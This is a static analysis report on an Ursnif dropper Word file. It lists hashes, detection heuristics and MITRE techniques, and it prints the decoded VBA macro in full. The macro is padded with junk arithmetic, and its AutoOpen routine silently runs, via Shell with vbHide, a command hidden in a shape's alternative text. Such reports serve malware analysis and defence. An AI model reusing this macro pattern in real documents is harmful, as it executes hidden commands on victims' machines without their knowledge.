Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 674e0765e67ca481…

MALICIOUS

Office (OLE)

Size: 74.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 0d0baf515932b058697811c39dc1305f
SHA-1: cd90b9b7d4a74c3fb1ade85a6a42fbe7666595a1
SHA-256: 674e0765e67ca4818ad0da62d4fcaed1ff57eb12cd2d2664278c5db39960a4ae
Risk score: 202

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, a common technique for executing arbitrary commands. The ClamAV detection 'Doc.Dropper.Ursnif-6864686-0' strongly suggests the Ursnif family, known for its dropper capabilities. The AutoOpen macro marker further supports the automated execution of malicious code upon opening the document.

Heuristics (6)

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3434 bytes
SHA-256: 634ab903abfd9cf451dbf88ffa6a7e2987aebbfff88e78751c9df91f140bfbda

Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ktujipo"
Function lhukacytufy()


Dim rdababe As Integer

Dim ILhDNh As Long

rdababe = 9401 + 1439

Dim nfykegygat As Integer

Dim dlig As Long

nfykegygat = 4972 + 4547

Dim jjededa As Integer
Dim ADYcwJ As Long
jjededa = 9040 + 8168

Dim YjQWMsUH As Integer

Dim jdirar As Long

YjQWMsUH = 1021 + 7059

Dim sgecuxaj As Integer

Dim fjudupesos As Long

sgecuxaj = 3332 + 8012

Dim WQeACzG As Integer
Dim nzubuxemute As Long
WQeACzG = 4701 + 9152

Dim npyreh As Integer

Dim lpumuwetuta As Long

npyreh = 7613 + 1886

Dim vGzLue As Integer

Dim nhadajeri As Long

vGzLue = 9708 + 6530

Dim ZuKzm As Integer
Dim STMWgXn As Long
ZuKzm = 1119 + 2263

sfifujukawy = "ghezuzeqe"


Dim JfXIC As Integer

Dim rFpbEGj As Long

JfXIC = 9893 + 7431

Dim jmoFUWl As Integer

Dim xwyse As Long

jmoFUWl = 2918 + 6125

Dim nXKxKsno As Integer
Dim wziqopywum As Long
nXKxKsno = 3208 + 3172

Dim AJgslO As Integer

Dim krahiqahu As Long

AJgslO = 8765 + 9981

Dim VApfn As Integer

Dim gtefefibawa As Long

VApfn = 3274 + 9028

Dim rcyc As Integer
Dim agKMLQv As Long
rcyc = 9520 + 3672

Dim KSWPc As Integer

Dim vzazacurap As Long

KSWPc = 8310 + 2246

Dim GYAJVdrD As Integer

Dim jzAMBYd As Long

GYAJVdrD = 3880 + 4962

Dim bnujevim As Integer
Dim njafezimawy As Long
bnujevim = 2338 + 2845

Set lhukacytufy = ActiveDocument.Shapes(sfifujukawy)


End Function
Sub AutoOpen()


Dim YphtCEYn As Integer

Dim gzel As Long

YphtCEYn = 9092 + 6541

Dim kBAaDtOq As Integer

Dim pnuwiqij As Long

kBAaDtOq = 2094 + 1711

Dim jrMxJE As Integer
Dim ynyhLH As Long
jrMxJE = 7955 + 3289

Dim DmWGYWp As Integer

Dim ckejaqaduv As Long

DmWGYWp = 5265 + 8962

Dim ncyven As Integer

Dim mqozi As Long

ncyven = 1110 + 4065

Dim kbezafavudu As Integer
Dim QbNHB As Long
kbezafavudu = 2648 + 4682

Set xvimiwuhax = lhukacytufy


Dim FGRJbKbG As Integer

Dim xblgeRF As Long

FGRJbKbG = 8819 + 6467

Dim oyLzk As Integer

Dim drunexe As Long

oyLzk = 7960 + 1145

Dim QRSyuTV As Integer
Dim ptoqot As Long
QRSyuTV = 3223 + 6703

Interaction.Shell$ _
xvimiwuhax.AlternativeText, vbHide


Dim foCtV As Integer

Dim UCJjYN As Long

foCtV = 3574 + 2335

Dim spamovytowa As Integer

Dim TheeM As Long

spamovytowa = 4769 + 1035

Dim whakohocaq As Integer
Dim wZkJB As Long
whakohocaq = 1019 + 1861

Dim gpojylotyr As Integer

Dim FKxoEdJd As Long

gpojylotyr = 4514 + 2182

Dim bwona As Integer

Dim fgeqevo As Long

bwona = 6063 + 3965

Dim oyXQqljQ As Integer
Dim osjhijd As Long
oyXQqljQ = 6993 + 8354

Dim KfKehwL As Integer

Dim ItgHN As Long

KfKehwL = 4853 + 8597

Dim pvNAuUtL As Integer

Dim YrAyPWjU As Long

pvNAuUtL = 3529 + 3940

Dim qFJJpXZ As Integer
Dim gtehigyli As Long
qFJJpXZ = 6871 + 5003

Dim tcuxerop As Integer

Dim FRQZnp As Long

tcuxerop = 6293 + 1170

Dim zgakofy As Integer

Dim vwew As Long

zgakofy = 7889 + 3751

Dim ANfMR As Integer
Dim vdurober As Long
ANfMR = 1194 + 9962

End Sub